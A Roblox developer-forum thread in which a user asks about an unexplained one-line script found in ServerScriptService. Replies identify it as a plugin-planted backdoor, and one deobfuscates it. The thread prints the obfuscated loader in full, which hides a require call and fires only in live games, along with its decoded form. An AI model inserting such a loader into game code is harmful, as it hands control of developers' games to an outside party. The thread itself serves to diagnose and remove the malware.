Random script in ServerScriptService?

So I just made a random baseplate and if I search “script” in the Explorer, a random script shows up.


I just made the baseplate and didn’t do anything. I didn’t place any parts, any free models, nothing. I’m not sure where the script came from. I don’t know if it’s meant to be here but I don’t know what it does. The script is pretty long as it’s all on one line so I’ll copy and paste it rather than taking a screenshot.

local uKaQU=game:GetService("RunService"):IsStudio();local RkFQ7=true;local Tzms7=false;local MvC5A=getfenv;if uKaQU ~= RkFQ7 then MvC5A()[string.reverse(tostring(string.reverse("\114\101\113\117".."\105\114\101")))](0x39DB7846*(2+2+2-1+2+2-4));end

If it does have a purpose, what is it? I don’t really script. I just want to be sure that it’s nothing bad.

I’m not sure if this is in the wrong category or not. If it is, please tell me.

That’s probably a backdoor for your game, please check your plugins and get rid of suspicious ones and ones you don’t use because they might be infected and all of your games have a backdoor…

2 Likes

This is most likely a plugin that is doing it. Look through your plugins, and see if you have any that don’t belong. Also, look at them deeply, as botted plugins that look like official ones have been around recently.

1 Like

After you uninstall some plugins, delete the script and rejoin studio and It shouldn’t be there. If It’s still there that means that the backdoor Isn’t removed.

1 Like

Alright, thank you! It turns out I had a fake version of F3X I guess.

2 Likes

The script actually means:

local isStudio = game:GetService("RunStudio"):IsStudio()

if not isStudio then
require(4853422430)
end

Seriously man, all I did was to use print() for it and the require bytecode is very common to what i know.

The required module is obfuscated and the owner looks very suspicious because of the avatar and he hasn’t logged in for 3 months, so yeah it’s a virus.